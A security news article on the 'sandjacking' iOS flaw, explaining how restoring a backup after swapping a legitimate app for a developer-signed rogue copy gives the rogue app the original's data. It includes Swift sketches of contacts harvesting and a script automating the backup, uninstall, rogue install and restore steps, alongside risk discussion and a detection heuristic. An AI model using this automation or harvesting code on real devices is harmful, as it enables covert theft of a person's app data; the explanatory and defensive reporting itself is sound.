The iOS app vulnerability Apple still hasn't fixed


We get inside the tale of the iOS app vulnerability that Apple knows about but hasn’t patched yet. Are you sitting comfortably? Then we’ll begin.

Once upon a time there was a gallant researcher who found a vulnerability in iOS devices, reported it to Apple, which fixed it, discovered the fix didn't actually hold, reported it again and, some six months later, is still waiting for that fix to appear. Welcome to the strange case of the Su-A-Cyder sandjacking attack.

To get to grips with sandjacking you first need to understand sandboxing, specifically the Apple iOS sandbox. Every iOS application must run inside its own sandbox, which prevents other processes from accessing the app or any data associated with it.
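To make that concrete, here is a minimal Swift sketch of what the sandbox means for an app at runtime; the file names and paths are purely illustrative. The app can read and write freely inside its own container, but identical calls aimed at another app's container are denied by the system.

```swift
import Foundation

// An app works freely inside its own sandbox container...
let fm = FileManager.default
let documents = fm.urls(for: .documentDirectory, in: .userDomainMask)[0]
let ownFile = documents.appendingPathComponent("notes.txt") // hypothetical file
try? "visible only to this app".write(to: ownFile, atomically: true, encoding: .utf8)

// ...but the same APIs cannot reach into another app's container.
// The path below is illustrative; on a non-jailbroken device the
// sandbox profile simply denies the access.
let foreignPath = "/var/mobile/Containers/Data/Application/OTHER-APP-UUID/Documents/notes.txt"
print(fm.isReadableFile(atPath: foreignPath)) // false
```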

As you can imagine, Apple has put rather a lot of effort into protecting the sandbox from those who would compromise it and the data it can contain. That's not to say those who like to break things have been skimping on their efforts to do the opposite, of course.

The walled garden approach taken by Apple has also been pretty successful in keeping the Japanese knotweed out of the iOS application flower bed, it has to be said. Which is hardly surprising, given that all apps from the App Store have to be signed with a certificate that requires a relatively strict authentication procedure to obtain. The idea being that malware authors will find it easier to go jump on the begonias in someone else's garden and leave Apple's alone.

If an attacker has physical access to any target device then it’s game over

You will note the use of terms such as 'pretty successful', 'relatively strict' and 'the idea being', all of which have been very deliberately chosen; there is no such thing as 100% secure, and that includes Apple's walled app garden. Here at IT Security Thing we have looked at how, in the recent past, determined threat actors have managed to infiltrate that garden using weaponised application development software, for example. XcodeGhost is just one example of why resting on your laurels is not an option in the security space, even the Apple one.

If further evidence were needed of how any weakness can be exploited given enough time, money and determination, you need look no further than the sandjacking threat.

A researcher from Mi3 Security, Chilik Tamir, has demonstrated how it's perfectly possible to 'SandJack' malware onto a non-jailbroken iOS device courtesy of Xcode 7, which enables a developer to create apps not destined for the App Store using easy-to-obtain certificates. Two things should immediately leap out at the security-minded here: firstly, there's the easy-to-obtain bit.

How easy? How does providing an Apple ID strike you? OK, so an email address is required as well, but we all know those are easier to fake than a parliamentary expenses claim (and that's pretty damn easy).

Secondly, these easy-to-obtain certs are for apps not destined to be uploaded to the App Store, so the final product won't even get the protection offered by the Apple application review process.

In mitigation, apps that don't undergo the full verification process have some limitations applied: no access to Apple Pay or Passbook, no access to iCloud or Game Center, no in-app purchase features and no access to application domains, for example.

But that doesn't mean they cannot be part of a malicious process chain, or that they cannot be of use to those with criminal intent. This type of certificated app is perfectly capable of exfiltrating certain data types, accessing the address book, the calendar and so on. What Tamir did was prove this to be the case with his Su-A-Cyder proof of concept, demonstrated at Black Hat Asia.
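By way of illustration, here is a short, hedged Swift sketch of the sort of harvesting a sideloaded, free-provisioned app could still perform. It uses only the standard Contacts framework and needs nothing more than the user tapping 'OK' on the permission prompt; what the rogue build would do with the data afterwards is left as a comment.

```swift
import Contacts

// Sketch of data reachable without App Store review or a paid developer account.
let store = CNContactStore()
store.requestAccess(for: .contacts) { granted, _ in
    guard granted else { return }
    let keys = [CNContactGivenNameKey, CNContactFamilyNameKey,
                CNContactPhoneNumbersKey] as [CNKeyDescriptor]
    let request = CNContactFetchRequest(keysToFetch: keys)
    try? store.enumerateContacts(with: request) { contact, _ in
        // A malicious build could serialise and exfiltrate these values.
        print(contact.givenName, contact.familyName,
              contact.phoneNumbers.map { $0.value.stringValue })
    }
}
```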

Tamir showed how it was possible to replace a legitimate application with a malicious version, giving threat actors complete access to the rogue application and its malicious capabilities.

Here at IT Security Thing we always like to look at what we call the RWR factor for such attacks: the Real World Risk. It has to be said that while the Su-A-Cyder tool does present a risk, the RWR factor is actually pretty low. The reason being that the threat actor would need physical access to the target iOS device, including knowledge of its passcode, in order to execute the attack. This doesn't make it impossible, far from it, but it does narrow the risk from a broad one to a very narrow field of attack indeed.

It is narrower still when you take into consideration that Apple closed the door on Su-A-Cyder from iOS 8.3 onwards, which prevented the installation of any app with a bundle ID similar to an existing one. Except that Tamir isn't the kind of researcher who gives up that easily; he continues to look for weaknesses in supposedly fixed systems, as every good researcher does.

And he found one, which is where the sandjacking attack methodology, still applying the Su-A-Cyder tool, comes in. Tamir demonstrated this at Hack-in-the-Box Amsterdam. Like many such vulnerabilities, the route to compromise is actually a lot easier than you might imagine. In this particular case it would seem that Apple was a little lax in its patching of iOS.

So while the installation process was fixed to prevent the replacement of legit apps with those having a similar bundle ID, Apple appears to have forgotten to fix the back door. Perhaps we should say the 'backup door', as Tamir found that the restore process still allowed a Su-A-Cyder approach to work.

No patch has yet been made available by Apple

Which gets us, at last, to the sandjacking process itself. Simply put, sandjacking can be accomplished by creating a backup of the device and then deleting the target application. You've probably got ahead of us now, but yes: you then install the malicious version of the app and restore from the previously created backup.
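Assuming the attacker had the device in hand along with its passcode, the sequence might be automated along these lines. This is a rough sketch, not Tamir's actual tooling: it assumes the open-source libimobiledevice command-line utilities (idevicebackup2 and ideviceinstaller) are installed, and the bundle ID, IPA path and backup directory are all hypothetical.

```swift
import Foundation

// Rough sketch of the sandjacking sequence described above.
func run(_ tool: String, _ arguments: [String]) throws {
    let process = Process()
    process.executableURL = URL(fileURLWithPath: tool)
    process.arguments = arguments
    try process.run()
    process.waitUntilExit()
}

let backupDir = "/tmp/target-backup"          // hypothetical local backup directory
let targetBundleID = "com.example.victimapp"  // hypothetical target app
let rogueIPA = "/tmp/rogue-build.ipa"         // hypothetical malicious build, same bundle ID

// 1. Back up the device, capturing the legit app's user data.
try run("/usr/local/bin/idevicebackup2", ["backup", backupDir])
// 2. Delete the legitimate target application.
try run("/usr/local/bin/ideviceinstaller", ["-U", targetBundleID])
// 3. Install the malicious, developer-signed version in its place.
try run("/usr/local/bin/ideviceinstaller", ["-i", rogueIPA])
// 4. Restore the backup; the rogue app stays put and inherits the old data.
try run("/usr/local/bin/idevicebackup2", ["restore", backupDir])
```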

The clever bit, or stupid depending upon your perspective, is that restoring that newly created backup does not remove the malicious app or replace it with the legitimate one. What does happen, as a result, is that the malicious app now has access (along with the threat actor) to any user data that was associated with the original install.

Mitigating factors remain much the same as before, not least that physical access to the device is still required, along with the device passcode. Additionally, the sandjacked application will only provide the threat actor with access to the sandbox of the legit app it has replaced. This means that every single target application will have to be replaced by its own malicious counterpart. However, given that the device is already required to be in the physical possession of the attacker, this should not prove overly problematic, and Tamir envisages the process being fully automated from start to finish.

No doubt Apple will close the door on this one soon enough, or you'd like to think so at least. In actual fact, Tamir reported the vulnerability in January (having discovered it in December 2015) and it has been confirmed by Apple. No patch has yet been made available, however, so one wonders how long it will take.

Not that Apple isn't taking this seriously; rather, we suspect it is just a matter of prioritising fixes. Luckily, in the meantime sandjacking has very limited appeal courtesy of the need to have possession of the target device. As we often say, if an attacker has physical access to any target device then it's game over. Simple as.

That said, sandjacking is interesting as it exposes some problems with sideways thinking from the iOS patching perspective. Using backup and restore to circumvent the fix should have been on Apple's radar, truth be told.

Whatever the case, if an attacker were successful, the victim would be hard-pressed to be any the wiser. The target app would appear to be perfectly legitimate in all ways, including full functionality. The only way to identify the installed app as rogue would involve inspecting the app's certificate and the device's provisioning settings, both of which are beyond the ken of the average user.
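For the curious, one rough heuristic (a sketch, not a complete detection method): App Store builds don't normally ship with an embedded provisioning profile, whereas developer-signed sideloads do, so its presence in the bundle is a hint worth investigating.

```swift
import Foundation

// Crude check from inside an app: a developer- or free-provisioned install
// typically carries embedded.mobileprovision; an App Store install does not.
let hasEmbeddedProfile = Bundle.main.path(forResource: "embedded",
                                          ofType: "mobileprovision") != nil
print(hasEmbeddedProfile
      ? "Developer-signed install: inspect the certificate and provisioning profile"
      : "No embedded profile: consistent with an App Store install")
```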
